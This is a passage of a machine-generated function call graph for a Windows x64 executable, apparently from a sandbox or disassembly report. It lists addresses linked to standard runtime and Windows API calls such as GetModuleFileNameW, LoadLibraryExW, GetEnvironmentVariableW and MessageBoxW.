7ff6e1b3b711 RtlCaptureContext RtlLookupFunctionEntry 15001->15002 15003 7ff6e1b3b776 memcpy_s 15002->15003 15004 7ff6e1b3b73a RtlVirtualUnwind 15002->15004 15005 7ff6e1b3b7a8 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 15003->15005 15004->15003 15006 7ff6e1b3b7fa _wfindfirst32i64 15005->15006 15006->14877 15008 7ff6e1b3b3be __scrt_dllmain_crt_thread_attach 15007->15008 15008->14897 15008->14898 15011 7ff6e1b525fc 15009->15011 15010 7ff6e1b3b3d0 15010->14897 15013 7ff6e1b3caf8 15010->15013 15011->15010 15019 7ff6e1b4ba20 15011->15019 15014 7ff6e1b3cb0a 15013->15014 15015 7ff6e1b3cb00 15013->15015 15014->14897 15031 7ff6e1b3ce74 15015->15031 15030 7ff6e1b4f7b8 EnterCriticalSection 15019->15030 15032 7ff6e1b3cb05 15031->15032 15033 7ff6e1b3ce83 15031->15033 15035 7ff6e1b3cee0 15032->15035 15039 7ff6e1b3d0b0 15033->15039 15036 7ff6e1b3cf0b 15035->15036 15037 7ff6e1b3cf0f 15036->15037 15038 7ff6e1b3ceee DeleteCriticalSection 15036->15038 15037->15014 15038->15036 15043 7ff6e1b3cf18 15039->15043 15044 7ff6e1b3d032 TlsFree 15043->15044 15045 7ff6e1b3cf5c __vcrt_InitializeCriticalSectionEx 15043->15045 15045->15044 15046 7ff6e1b3cf8a LoadLibraryExW 15045->15046 15047 7ff6e1b3d021 GetProcAddress 15045->15047 15051 7ff6e1b3cfcd LoadLibraryExW 15045->15051 15048 7ff6e1b3cfab GetLastError 15046->15048 15049 7ff6e1b3d001 15046->15049 15047->15044 15048->15045 15049->15047 15050 7ff6e1b3d018 FreeLibrary 15049->15050 15050->15047 15051->15045 15051->15049 15053 7ff6e1b3b0f0 15052->15053 15069 7ff6e1b457cc 15053->15069 15055 7ff6e1b3b0fc 15075 7ff6e1b3b3e8 15055->15075 15057 7ff6e1b3b6cc 7 API calls 15059 7ff6e1b3b195 15057->15059 15058 7ff6e1b3b114 _RTC_Initialize 15067 7ff6e1b3b169 15058->15067 15080 7ff6e1b3b598 15058->15080 15059->14903 15061 7ff6e1b3b129 15083 7ff6e1b47e9c 15061->15083 15067->15057 15068 7ff6e1b3b185 15067->15068 15068->14903 15070 7ff6e1b457dd 15069->15070 15071 7ff6e1b44474 memcpy_s 11 API calls 15070->15071 15074 7ff6e1b457e5 15070->15074 15072 7ff6e1b457f4 15071->15072 15073 7ff6e1b49de0 _invalid_parameter_noinfo 37 API calls 15072->15073 15073->15074 15074->15055 15076 7ff6e1b3b3f9 15075->15076 15079 7ff6e1b3b3fe __scrt_acquire_startup_lock 15075->15079 15077 7ff6e1b3b6cc 7 API calls 15076->15077 15076->15079 15078 7ff6e1b3b472 15077->15078 15079->15058 15109 7ff6e1b3b55c 15080->15109 15082 7ff6e1b3b5a1 15082->15061 15084 7ff6e1b47ebc 15083->15084 15085 7ff6e1b3b135 15083->15085 15086 7ff6e1b47eda GetModuleFileNameW 15084->15086 15087 7ff6e1b47ec4 15084->15087 15085->15067 15108 7ff6e1b3b66c InitializeSListHead 15085->15108 15091 7ff6e1b47f05 15086->15091 15088 7ff6e1b44474 memcpy_s 11 API calls 15087->15088 15089 7ff6e1b47ec9 15088->15089 15090 7ff6e1b49de0 _invalid_parameter_noinfo 37 API calls 15089->15090 15090->15085 15124 7ff6e1b47e3c 15091->15124 15094 7ff6e1b47f4d 15095 7ff6e1b44474 memcpy_s 11 API calls 15094->15095 15096 7ff6e1b47f52 15095->15096 15097 7ff6e1b49e48 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 15096->15097 15100 7ff6e1b47f60 15097->15100 15098 7ff6e1b47f87 15101 7ff6e1b49e48 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 15098->15101 15099 7ff6e1b47f65 15099->15098 15102 7ff6e1b47fcc 15099->15102 15103 7ff6e1b47fb3 15099->15103 15100->15085 15101->15085 15105 7ff6e1b49e48 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 15102->15105 15104 7ff6e1b49e48 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 15103->15104 15106 7ff6e1b47fbc 15104->15106 15105->15098 15107 7ff6e1b49e48 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 15106->15107 15107->15100 15110 7ff6e1b3b576 15109->15110 15112 7ff6e1b3b56f 15109->15112 15113 7ff6e1b48f1c 15110->15113 15112->15082 15116 7ff6e1b48b58 15113->15116 15123 7ff6e1b4f7b8 EnterCriticalSection 15116->15123 15125 7ff6e1b47e8c 15124->15125 15126 7ff6e1b47e54 15124->15126 15125->15094 15125->15099 15126->15125 15127 7ff6e1b4dd70 memcpy_s 11 API calls 15126->15127 15128 7ff6e1b47e82 15127->15128 15129 7ff6e1b49e48 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 15128->15129 15129->15125 15131 7ff6e1b3c220 15130->15131 15131->14908 15131->15131 15133 7ff6e1b3764f 15132->15133 15134 7ff6e1b376a0 WideCharToMultiByte 15133->15134 15135 7ff6e1b37657 __std_exception_destroy 15133->15135 15136 7ff6e1b37748 15133->15136 15138 7ff6e1b376f6 WideCharToMultiByte 15133->15138 15134->15133 15134->15136 15135->14912 15404 7ff6e1b32620 15136->15404 15138->15133 15138->15136 15142 7ff6e1b4ec70 15139->15142 15140 7ff6e1b4ecc3 15141 7ff6e1b49d14 _invalid_parameter_noinfo 37 API calls 15140->15141 15145 7ff6e1b4ecec 15141->15145 15142->15140 15143 7ff6e1b4ed16 15142->15143 15801 7ff6e1b4eb48 15143->15801 15145->14914 15147 7ff6e1b31b05 15146->15147 15148 7ff6e1b31b20 15147->15148 15809 7ff6e1b324d0 15147->15809 15148->14981 15150 7ff6e1b33bc0 15148->15150 15151 7ff6e1b3ade0 15150->15151 15152 7ff6e1b33bcc GetModuleFileNameW 15151->15152 15153 7ff6e1b33bfb 15152->15153 15154 7ff6e1b33c12 15152->15154 15155 7ff6e1b32620 57 API calls 15153->15155 15849 7ff6e1b37b70 15154->15849 15157 7ff6e1b33c0e 15155->15157 15160 7ff6e1b3adb0 _wfindfirst32i64 8 API calls 15157->15160 15159 7ff6e1b32770 59 API calls 15159->15157 15161 7ff6e1b33c4f 15160->15161 15161->14920 15163 7ff6e1b31b30 49 API calls 15162->15163 15164 7ff6e1b33b5d 15163->15164 15164->14922 15166 7ff6e1b369ba 15165->15166 15167 7ff6e1b37a60 57 API calls 15166->15167 15168 7ff6e1b369dc GetEnvironmentVariableW 15167->15168 15169 7ff6e1b36a46 15168->15169 15170 7ff6e1b369f4 ExpandEnvironmentStringsW 15168->15170 15171 7ff6e1b3adb0 _wfindfirst32i64 8 API calls 15169->15171 15172 7ff6e1b37b70 59 API calls 15170->15172 15174 7ff6e1b36a58 15171->15174 15173 7ff6e1b36a1c 15172->15173 15173->15169 15175 7ff6e1b36a26 15173->15175 15174->14924 15860 7ff6e1b4913c 15175->15860 15178 7ff6e1b3adb0 _wfindfirst32i64 8 API calls 15179 7ff6e1b36a3e 15178->15179 15179->14924 15181 7ff6e1b37a60 57 API calls 15180->15181 15182 7ff6e1b36fd7 SetEnvironmentVariableW 15181->15182 15183 7ff6e1b36fef __std_exception_destroy 15182->15183 15183->14928 15185 7ff6e1b31b30 49 API calls 15184->15185 15186 7ff6e1b31a00 15185->15186 15187 7ff6e1b31b30 49 API calls 15186->15187 15192 7ff6e1b31a7a 15186->15192 15188 7ff6e1b31a22 15187->15188 15189 7ff6e1b33b40 49 API calls 15188->15189 15188->15192 15190 7ff6e1b31a3b 15189->15190 15867 7ff6e1b317b0 15190->15867 15192->14931 15192->14933 15194 7ff6e1b3f2dc 74 API calls 15194->15192 15196 7ff6e1b35e75 15195->15196 15197 7ff6e1b338d0 15196->15197 15198 7ff6e1b324d0 59 API calls 15196->15198 15197->14978 15293 7ff6e1b35b00 15197->15293 15198->15197 15200 7ff6e1b331e4 15199->15200 15206 7ff6e1b331a3 15199->15206 15201 7ff6e1b33223 15200->15201 15202 7ff6e1b31ab0 74 API calls 15200->15202 15203 7ff6e1b3adb0 _wfindfirst32i64 8 API calls 15201->15203 15202->15200 15204 7ff6e1b33235 15203->15204 15204->14981 15209 7ff6e1b36f50 15204->15209 15206->15200 15940 7ff6e1b31440 15206->15940 15974 7ff6e1b329b0 15206->15974 16029 7ff6e1b31780 15206->16029 15210 7ff6e1b37a60 57 API calls 15209->15210 15211 7ff6e1b36f6f 15210->15211 15212 7ff6e1b37a60 57 API calls 15211->15212 15213 7ff6e1b36f7f 15212->15213 15214 7ff6e1b466e4 38 API calls 15213->15214 15215 7ff6e1b36f8d __std_exception_destroy 15214->15215 15215->14972 15217 7ff6e1b37010 15216->15217 15218 7ff6e1b37a60 57 API calls 15217->15218 15219 7ff6e1b37041 SetConsoleCtrlHandler GetStartupInfoW 15218->15219 15220 7ff6e1b370a2 15219->15220 16904 7ff6e1b491b4 15220->16904 15240 7ff6e1b32790 15239->15240 15241 7ff6e1b43c14 49 API calls 15240->15241 15242 7ff6e1b327db memcpy_s 15241->15242 15243 7ff6e1b37a60 57 API calls 15242->15243 15244 7ff6e1b32810 15243->15244 15245 7ff6e1b3284d MessageBoxA 15244->15245 15246 7ff6e1b32815 15244->15246 15248 7ff6e1b32867 15245->15248 15247 7ff6e1b37a60 57 API calls 15246->15247 15249 7ff6e1b3282f MessageBoxW 15247->15249 15250 7ff6e1b3adb0 _wfindfirst32i64 8 API calls 15248->15250 15249->15248 15251 7ff6e1b32877 15250->15251 15251->14981 15253 7ff6e1b33cdc 15252->15253 15254 7ff6e1b37a60 57 API calls 15253->15254 15255 7ff6e1b33d07 15254->15255 15256 7ff6e1b37a60 57 API calls 15255->15256 15257 7ff6e1b33d1a 15256->15257 16922 7ff6e1b454f8 15257->16922 15260 7ff6e1b3adb0 _wfindfirst32i64 8 API calls 15261 7ff6e1b337fa 15260->15261 15261->14951 15262 7ff6e1b37230 15261->15262 15263 7ff6e1b37254 15262->15263 15264 7ff6e1b3f964 73 API calls 15263->15264 15269 7ff6e1b3732b __std_exception_destroy 15263->15269 15265 7ff6e1b3726e 15264->15265 15265->15269 17301 7ff6e1b47968 15265->17301 15267 7ff6e1b3f964 73 API calls 15270 7ff6e1b37283 15267->15270 15268 7ff6e1b3f62c _fread_nolock 53 API calls 15268->15270 15269->14954 15270->15267 15270->15268 15270->15269 15272 7ff6e1b3f30c 15271->15272 17316 7ff6e1b3f0b8 15272->17316 15274 7ff6e1b3f325 15274->14951 15276 7ff6e1b332b7 15275->15276 15277 7ff6e1b332e0 15275->15277 15276->15277 15278 7ff6e1b31780 59 API calls 15276->15278 15277->14934 15278->15276 15280 7ff6e1b37b07 MultiByteToWideChar 15279->15280 15281 7ff6e1b37a81 MultiByteToWideChar 15279->15281 15282 7ff6e1b37b2a 15280->15282 15283 7ff6e1b37b4f 15280->15283 15284 7ff6e1b37aa7 15281->15284 15285 7ff6e1b37acc 15281->15285 15286 7ff6e1b32620 55 API calls 15282->15286 15283->14939 15287 7ff6e1b32620 55 API calls 15284->15287 15285->15280 15290 7ff6e1b37ae2 15285->15290 15289 7ff6e1b37b3d 15286->15289 15288 7ff6e1b37aba 15287->15288 15288->14939 15289->14939 15291 7ff6e1b32620 55 API calls 15290->15291 15292 7ff6e1b37af5 15291->15292 15292->14939 15294 7ff6e1b35b24 15293->15294 15298 7ff6e1b35b51 15293->15298 15295 7ff6e1b35b4c 15294->15295 15296 7ff6e1b31780 59 API calls 15294->15296 15294->15298 15302 7ff6e1b35b47 memcpy_s __std_exception_destroy 15294->15302 17327 7ff6e1b312b0 15295->17327 15296->15294 15298->15302 17353 7ff6e1b33d50 15298->17353 15300 7ff6e1b35bb7 15301 7ff6e1b32770 59 API calls 15300->15301 15300->15302 15301->15302 15302->14956 15309 7ff6e1b3567a memcpy_s 15303->15309 15304 7ff6e1b3579f 15307 7ff6e1b33d50 49 API calls 15304->15307 15306 7ff6e1b357bb 15308 7ff6e1b32770 59 API calls 15306->15308 15310 7ff6e1b35818 15307->15310 15314 7ff6e1b357b1 __std_exception_destroy 15308->15314 15309->15304 15309->15306 15309->15309 15311 7ff6e1b33d50 49 API calls 15309->15311 15312 7ff6e1b35780 15309->15312 15320 7ff6e1b31440 161 API calls 15309->15320 15321 7ff6e1b357a1 15309->15321 17356 7ff6e1b31650 15309->17356 15313 7ff6e1b33d50 49 API calls 15310->15313 15311->15309 15312->15304 15315 7ff6e1b33d50 49 API calls 15312->15315 15316 7ff6e1b35848 15313->15316 15317 7ff6e1b3adb0 _wfindfirst32i64 8 API calls 15314->15317 15315->15304 15319 7ff6e1b33d50 49 API calls 15316->15319 15318 7ff6e1b338f9 15317->15318 15318->14965 15323 7ff6e1b355e0 15318->15323 15319->15314 15320->15309 15322 7ff6e1b32770 59 API calls 15321->15322 15322->15314 17361 7ff6e1b371e0 15323->17361 15325 7ff6e1b355fc 15326 7ff6e1b371e0 58 API calls 15325->15326 15327 7ff6e1b3560f 15326->15327 15328 7ff6e1b35645 15327->15328 15329 7ff6e1b35627 15327->15329 15330 7ff6e1b32770 59 API calls 15328->15330 17365 7ff6e1b35f70 GetProcAddress 15329->17365 15332 7ff6e1b33907 15330->15332 15332->14965 15332->14973 15334 7ff6e1b35cd4 15333->15334 15343 7ff6e1b358ed 15339->15343 15344 7ff6e1b358c2 15339->15344 15340 7ff6e1b359ab 15340->15343 17425 7ff6e1b371c0 FreeLibrary 15340->17425 15343->14978 15344->15340 15344->15343 17424 7ff6e1b371c0 FreeLibrary 15344->17424 15346 7ff6e1b31b55 15345->15346 15347 7ff6e1b43c14 49 API calls 15346->15347 15348 7ff6e1b31b78 15347->15348 15348->14970 17426 7ff6e1b34980 15349->17426 15352 7ff6e1b3311d 15352->14977 15354 7ff6e1b330f4 15354->15352 17482 7ff6e1b34700 15354->17482 15423 7ff6e1b3ade0 15404->15423 15406 7ff6e1b3263c GetLastError 15407 7ff6e1b32669 15406->15407 15425 7ff6e1b43c14 15407->15425 15412 7ff6e1b31b30 49 API calls 15413 7ff6e1b326c6 memcpy_s 15412->15413 15414 7ff6e1b37a60 54 API calls 15413->15414 15415 7ff6e1b326fb 15414->15415 15416 7ff6e1b32738 MessageBoxA 15415->15416 15417 7ff6e1b32700 15415->15417 15419 7ff6e1b32752 15416->15419 15418 7ff6e1b37a60 54 API calls 15417->15418 15420 7ff6e1b3271a MessageBoxW 15418->15420 15421 7ff6e1b3adb0 _wfindfirst32i64 8 API calls 15419->15421 15420->15419 15422 7ff6e1b32762 15421->15422 15422->15135 15424 7ff6e1b3ae0a 15423->15424 15424->15406 15424->15424 15426 7ff6e1b43c6e 15425->15426 15427 7ff6e1b43c93 15426->15427 15429 7ff6e1b43ccf 15426->15429 15428 7ff6e1b49d14 _invalid_parameter_noinfo 37 API calls 15427->15428 15432 7ff6e1b43cbd 15428->15432 15455 7ff6e1b41ea0 15429->15455 15433 7ff6e1b3adb0 _wfindfirst32i64 8 API calls 15432->15433 15436 7ff6e1b32697 15433->15436 15434 7ff6e1b49e48 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 15434->15432 15435 7ff6e1b43d78 15437 7ff6e1b43dac 15435->15437 15438 7ff6e1b43d81 15435->15438 15443 7ff6e1b374e0 15436->15443 15437->15434 15441 7ff6e1b49e48 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 15438->15441 15439 7ff6e1b43dd0 15439->15437 15440 7ff6e1b43dda 15439->15440 15442 7ff6e1b49e48 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 15440->15442 15441->15432 15442->15432 15444 7ff6e1b374ec 15443->15444 15445 7ff6e1b37507 GetLastError 15444->15445 15446 7ff6e1b3750d FormatMessageW 15444->15446 15445->15446 15447 7ff6e1b3755c WideCharToMultiByte 15446->15447 15448 7ff6e1b37540 15446->15448 15450 7ff6e1b37596 15447->15450 15451 7ff6e1b37553 15447->15451 15449 7ff6e1b32620 54 API calls 15448->15449 15449->15451 15452 7ff6e1b32620 54 API calls 15450->15452 15453 7ff6e1b3adb0 _wfindfirst32i64 8 API calls 15451->15453 15452->15451 15454 7ff6e1b3269e 15453->15454 15454->15412 15456 7ff6e1b41ede 15455->15456 15457 7ff6e1b41ece 15455->15457 15458 7ff6e1b41ee7 15456->15458 15462 7ff6e1b41f15 15456->15462 15461 7ff6e1b49d14 _invalid_parameter_noinfo 37 API calls 15457->15461 15459 7ff6e1b49d14 _invalid_parameter_noinfo 37 API calls 15458->15459 15460 7ff6e1b41f0d 15459->15460 15460->15435 15460->15437 15460->15438 15460->15439 15461->15460 15462->15457 15462->15460 15465 7ff6e1b421c4 15462->15465 15469 7ff6e1b42830 15462->15469 15495 7ff6e1b424f8 15462->15495 15525 7ff6e1b41d80 15462->15525 15528 7ff6e1b43a50 15462->15528 15467 7ff6e1b49d14 _invalid_parameter_noinfo 37 API calls 15465->15467 15467->15457 15470 7ff6e1b428e5 15469->15470 15471 7ff6e1b42872 15469->15471 15472 7ff6e1b428ea 15470->15472 15473 7ff6e1b4293f 15470->15473 15474 7ff6e1b42878 15471->15474 15475 7ff6e1b4290f 15471->15475 15476 7ff6e1b428ec 15472->15476 15477 7ff6e1b4291f 15472->15477 15473->15475 15486 7ff6e1b4294e 15473->15486 15492 7ff6e1b428a8 15473->15492 15482 7ff6e1b4287d 15474->15482 15474->15486 15552 7ff6e1b40de0 15475->15552 15478 7ff6e1b4288d 15476->15478 15485 7ff6e1b428fb 15476->15485 15559 7ff6e1b409d0 15477->15559 15494 7ff6e1b4297d 15478->15494 15534 7ff6e1b43194 15478->15534 15482->15478 15484 7ff6e1b428c0 15482->15484 15482->15492 15484->15494 15544 7ff6e1b43650 15484->15544 15485->15475 15487 7ff6e1b42900 15485->15487 15486->15494 15566 7ff6e1b411f0 15486->15566 15487->15494 15548 7ff6e1b437e8 15487->15548 15489 7ff6e1b3adb0 _wfindfirst32i64 8 API calls 15491 7ff6e1b42c13 15489->15491 15491->15462 15492->15494 15573 7ff6e1b4da30 15492->15573 15494->15489 15496 7ff6e1b42519 15495->15496 15497 7ff6e1b42503 15495->15497 15498 7ff6e1b49d14 _invalid_parameter_noinfo 37 API calls 15496->15498 15505 7ff6e1b42557 15496->15505 15499 7ff6e1b428e5 15497->15499 15500 7ff6e1b42872 15497->15500 15497->15505 15498->15505 15501 7ff6e1b428ea 15499->15501 15502 7ff6e1b4293f 15499->15502 15503 7ff6e1b42878 15500->15503 15504 7ff6e1b4290f 15500->15504 15506 7ff6e1b428ec 15501->15506 15507 7ff6e1b4291f 15501->15507 15502->15504 15508 7ff6e1b4294e 15502->15508 15523 7ff6e1b428a8 15502->15523 15503->15508 15512 7ff6e1b4287d 15503->15512 15509 7ff6e1b40de0 38 API calls 15504->15509 15505->15462 15514 7ff6e1b428fb 15506->15514 15517 7ff6e1b4288d 15506->15517 15510 7ff6e1b409d0 38 API calls 15507->15510 15513 7ff6e1b411f0 38 API calls 15508->15513 15524 7ff6e1b4297d 15508->15524 15509->15523 15510->15523 15511 7ff6e1b43194 47 API calls 15511->15523 15515 7ff6e1b428c0 15512->15515 15512->15517 15512->15523 15513->15523 15514->15504 15516 7ff6e1b42900 15514->15516 15518 7ff6e1b43650 47 API calls 15515->15518 15515->15524 15520 7ff6e1b437e8 37 API calls 15516->15520 15516->15524 15517->15511 15517->15524 15518->15523 15519 7ff6e1b3adb0 _wfindfirst32i64 8 API calls 15521 7ff6e1b42c13 15519->15521 15520->15523 15521->15462 15522 7ff6e1b4da30 47 API calls 15522->15523 15523->15522 15523->15524 15524->15519 15729 7ff6e1b3ffa4 15525->15729 15529 7ff6e1b43a67 15528->15529 15746 7ff6e1b4cb90 15529->15746 15535 7ff6e1b431b6 15534->15535 15583 7ff6e1b3fe10 15535->15583 15540 7ff6e1b43a50 45 API calls 15541 7ff6e1b432f3 15540->15541 15542 7ff6e1b43a50 45 API calls 15541->15542 15543 7ff6e1b4337c 15541->15543 15542->15543 15543->15492 15545 7ff6e1b436d0 15544->15545 15546 7ff6e1b43668 15544->15546 15545->15492 15546->15545 15547 7ff6e1b4da30 47 API calls 15546->15547 15547->15545 15550 7ff6e1b43809 15548->15550 15549 7ff6e1b49d14 _invalid_parameter_noinfo 37 API calls 15551 7ff6e1b4383a 15549->15551 15550->15549 15550->15551 15551->15492 15553 7ff6e1b40e13 15552->15553 15554 7ff6e1b40e42 15553->15554 15556 7ff6e1b40eff 15553->15556 15555 7ff6e1b3fe10 12 API calls 15554->15555 15558 7ff6e1b40e7f 15554->15558 15555->15558 15557 7ff6e1b49d14 _invalid_parameter_noinfo 37 API calls 15556->15557 15557->15558 15558->15492 15560 7ff6e1b40a03 15559->15560 15561 7ff6e1b40a32 15560->15561 15563 7ff6e1b40aef 15560->15563 15562 7ff6e1b3fe10 12 API calls 15561->15562 15565 7ff6e1b40a6f 15561->15565 15562->15565 15564 7ff6e1b49d14 _invalid_parameter_noinfo 37 API calls 15563->15564 15564->15565 15565->15492 15567 7ff6e1b41223 15566->15567 15568 7ff6e1b41252 15567->15568 15570 7ff6e1b4130f 15567->15570 15569 7ff6e1b3fe10 12 API calls 15568->15569 15572 7ff6e1b4128f 15568->15572 15569->15572 15571 7ff6e1b49d14 _invalid_parameter_noinfo 37 API calls 15570->15571 15571->15572 15572->15492 15574 7ff6e1b4da58 15573->15574 15575 7ff6e1b4da9d 15574->15575 15577 7ff6e1b43a50 45 API calls 15574->15577 15579 7ff6e1b4da5d memcpy_s 15574->15579 15582 7ff6e1b4da86 memcpy_s 15574->15582 15575->15579 15575->15582 15726 7ff6e1b4f0e8 15575->15726 15576 7ff6e1b49d14 _invalid_parameter_noinfo 37 API calls 15576->15579 15577->15575 15579->15492 15582->15576 15582->15579 15584 7ff6e1b3fe47 15583->15584 15590 7ff6e1b3fe36 15583->15590 15584->15590 15613 7ff6e1b4cafc 15584->15613 15586 7ff6e1b3fe88 15588 7ff6e1b49e48 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 15586->15588 15588->15590 15589 7ff6e1b49e48 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 15589->15586 15591 7ff6e1b4d748 15590->15591 15592 7ff6e1b4d798 15591->15592 15593 7ff6e1b4d765 15591->15593 15592->15593 15595 7ff6e1b4d7ca 15592->15595 15594 7ff6e1b49d14 _invalid_parameter_noinfo 37 API calls 15593->15594 15604 7ff6e1b432d1 15594->15604 15601 7ff6e1b4d8dd 15595->15601 15608 7ff6e1b4d812 15595->15608 15596 7ff6e1b4d9cf 15653 7ff6e1b4cc34 15596->15653 15598 7ff6e1b4d995 15646 7ff6e1b4cfcc 15598->15646 15600 7ff6e1b4d964 15639 7ff6e1b4d2ac 15600->15639 15601->15596 15601->15598 15601->15600 15603 7ff6e1b4d927 15601->15603 15606 7ff6e1b4d91d 15601->15606 15629 7ff6e1b4d4dc 15603->15629 15604->15540 15604->15541 15606->15598 15607 7ff6e1b4d922 15606->15607 15607->15600 15607->15603 15608->15604 15620 7ff6e1b491dc 15608->15620 15611 7ff6e1b49e00 _wfindfirst32i64 17 API calls 15612 7ff6e1b4da2c 15611->15612 15614 7ff6e1b4cb0b memcpy_s 15613->15614 15615 7ff6e1b4cb47 15613->15615 15614->15615 15617 7ff6e1b4cb2e RtlAllocateHeap 15614->15617 15619 7ff6e1b526e0 memcpy_s 2 API calls 15614->15619 15616 7ff6e1b44474 memcpy_s 11 API calls 15615->15616 15618 7ff6e1b3fe74 15616->15618 15617->15614 15617->15618 15618->15586 15618->15589 15619->15614 15621 7ff6e1b491e9 15620->15621 15622 7ff6e1b491f3 15620->15622 15621->15622 15627 7ff6e1b4920e 15621->15627 15623 7ff6e1b44474 memcpy_s 11 API calls 15622->15623 15624 7ff6e1b491fa 15623->15624 15626 7ff6e1b49de0 _invalid_parameter_noinfo 37 API calls 15624->15626 15625 7ff6e1b49206 15625->15604 15625->15611 15626->15625 15627->15625 15628 7ff6e1b44474 memcpy_s 11 API calls 15627->15628 15628->15624 15662 7ff6e1b531fc 15629->15662 15633 7ff6e1b4d584 15634 7ff6e1b4d5d9 15633->15634 15636 7ff6e1b4d5a4 15633->15636 15638 7ff6e1b4d588 15633->15638 15715 7ff6e1b4d0c8 15634->15715 15711 7ff6e1b4d384 15636->15711 15638->15604 15640 7ff6e1b531fc 38 API calls 15639->15640 15641 7ff6e1b4d2f6 15640->15641 15642 7ff6e1b52c44 37 API calls 15641->15642 15643 7ff6e1b4d346 15642->15643 15644 7ff6e1b4d34a 15643->15644 15645 7ff6e1b4d384 45 API calls 15643->15645 15644->15604 15645->15644 15647 7ff6e1b531fc 38 API calls 15646->15647 15648 7ff6e1b4d017 15647->15648 15649 7ff6e1b52c44 37 API calls 15648->15649 15650 7ff6e1b4d06f 15649->15650 15651 7ff6e1b4d073 15650->15651 15652 7ff6e1b4d0c8 45 API calls 15650->15652 15651->15604 15652->15651 15654 7ff6e1b4ccac 15653->15654 15655 7ff6e1b4cc79 15653->15655 15657 7ff6e1b4ccc4 15654->15657 15659 7ff6e1b4cd45 15654->15659 15656 7ff6e1b49d14 _invalid_parameter_noinfo 37 API calls 15655->15656 15661 7ff6e1b4cca5 memcpy_s 15656->15661 15658 7ff6e1b4cfcc 46 API calls 15657->15658 15658->15661 15660 7ff6e1b43a50 45 API calls 15659->15660 15659->15661 15660->15661 15661->15604 15663 7ff6e1b5324f fegetenv 15662->15663 15664 7ff6e1b5715c 37 API calls 15663->15664 15667 7ff6e1b532a2 15664->15667 15665 7ff6e1b532cf 15670 7ff6e1b491dc __std_exception_copy 37 API calls 15665->15670 15666 7ff6e1b53392 15668 7ff6e1b5715c 37 API calls 15666->15668 15667->15666 15671 7ff6e1b5336c 15667->15671 15672 7ff6e1b532bd 15667->15672 15669 7ff6e1b533bc 15668->15669 15673 7ff6e1b5715c 37 API calls 15669->15673 15674 7ff6e1b5334d 15670->15674 15675 7ff6e1b491dc __std_exception_copy 37 API calls 15671->15675 15672->15665 15672->15666 15676 7ff6e1b533cd 15673->15676 15677 7ff6e1b54474 15674->15677 15681 7ff6e1b53355 15674->15681 15675->15674 15679 7ff6e1b57350 20 API calls 15676->15679 15678 7ff6e1b49e00 _wfindfirst32i64 17 API calls 15677->15678 15680 7ff6e1b54489 15678->15680 15691 7ff6e1b53436 memcpy_s 15679->15691 15682 7ff6e1b3adb0 _wfindfirst32i64 8 API calls 15681->15682 15683 7ff6e1b4d529 15682->15683 15707 7ff6e1b52c44 15683->15707 15684 7ff6e1b53dbb memcpy_s 15686 7ff6e1b53b1f 15684->15686 15690 7ff6e1b53acb 15684->15690 15700 7ff6e1b44474 11 API calls memcpy_s 15684->15700 15706 7ff6e1b49de0 37 API calls _invalid_parameter_noinfo 15684->15706 15685 7ff6e1b537df memcpy_s 15688 7ff6e1b52d60 37 API calls 15686->15688 15687 7ff6e1b53477 memcpy_s 15687->15684 15701 7ff6e1b538d3 memcpy_s 15687->15701 15689 7ff6e1b54237 15688->15689 15697 7ff6e1b5448c memcpy_s 37 API calls 15689->15697 15705 7ff6e1b54292 15689->15705 15690->15686 15692 7ff6e1b5448c memcpy_s 37 API calls 15690->15692 15691->15685 15691->15687 15693 7ff6e1b44474 memcpy_s 11 API calls 15691->15693 15692->15686 15695 7ff6e1b538b0 15693->15695 15694 7ff6e1b54418 15698 7ff6e1b5715c 37 API calls 15694->15698 15696 7ff6e1b49de0 _invalid_parameter_noinfo 37 API calls 15695->15696 15696->15687 15697->15705 15698->15681 15699 7ff6e1b44474 11 API calls memcpy_s 15699->15701 15700->15684 15701->15690 15701->15699 15703 7ff6e1b49de0 37 API calls _invalid_parameter_noinfo 15701->15703 15702 7ff6e1b52d60 37 API calls 15702->15705 15703->15701 15704 7ff6e1b5448c memcpy_s 37 API calls 15704->15705 15705->15694 15705->15702 15705->15704 15706->15684 15708 7ff6e1b52c63 15707->15708 15709 7ff6e1b49d14 _invalid_parameter_noinfo 37 API calls 15708->15709 15710 7ff6e1b52c8e memcpy_s 15708->15710 15709->15710 15710->15633 15712 7ff6e1b4d3b0 memcpy_s 15711->15712 15713 7ff6e1b43a50 45 API calls 15712->15713 15714 7ff6e1b4d46a memcpy_s 15712->15714 15713->15714 15714->15638 15716 7ff6e1b4d103 15715->15716 15719 7ff6e1b4d150 memcpy_s 15715->15719 15717 7ff6e1b49d14 _invalid_parameter_noinfo 37 API calls 15716->15717 15718 7ff6e1b4d12f 15717->15718 15718->15638 15720 7ff6e1b4d1bb 15719->15720 15722 7ff6e1b43a50 45 API calls 15719->15722 15721 7ff6e1b491dc __std_exception_copy 37 API calls 15720->15721 15723 7ff6e1b4d1fd memcpy_s 15721->15723 15722->15720 15724 7ff6e1b49e00 _wfindfirst32i64 17 API calls 15723->15724 15725 7ff6e1b4d2a8 15724->15725 15728 7ff6e1b4f10c WideCharToMultiByte 15726->15728 15730 7ff6e1b3ffd1 15729->15730 15731 7ff6e1b3ffe3 15729->15731 15732 7ff6e1b44474 memcpy_s 11 API calls 15730->15732 15733 7ff6e1b3fff0 15731->15733 15737 7ff6e1b4002d 15731->15737 15734 7ff6e1b3ffd6 15732->15734 15735 7ff6e1b49d14 _invalid_parameter_noinfo 37 API calls 15733->15735 15736 7ff6e1b49de0 _invalid_parameter_noinfo 37 API calls 15734->15736 15741 7ff6e1b3ffe1 15735->15741 15736->15741 15738 7ff6e1b400d6 15737->15738 15739 7ff6e1b44474 memcpy_s 11 API calls 15737->15739 15740 7ff6e1b44474 memcpy_s 11 API calls 15738->15740 15738->15741 15742 7ff6e1b400cb 15739->15742 15743 7ff6e1b40180 15740->15743 15741->15462 15744 7ff6e1b49de0 _invalid_parameter_noinfo 37 API calls 15742->15744 15745 7ff6e1b49de0 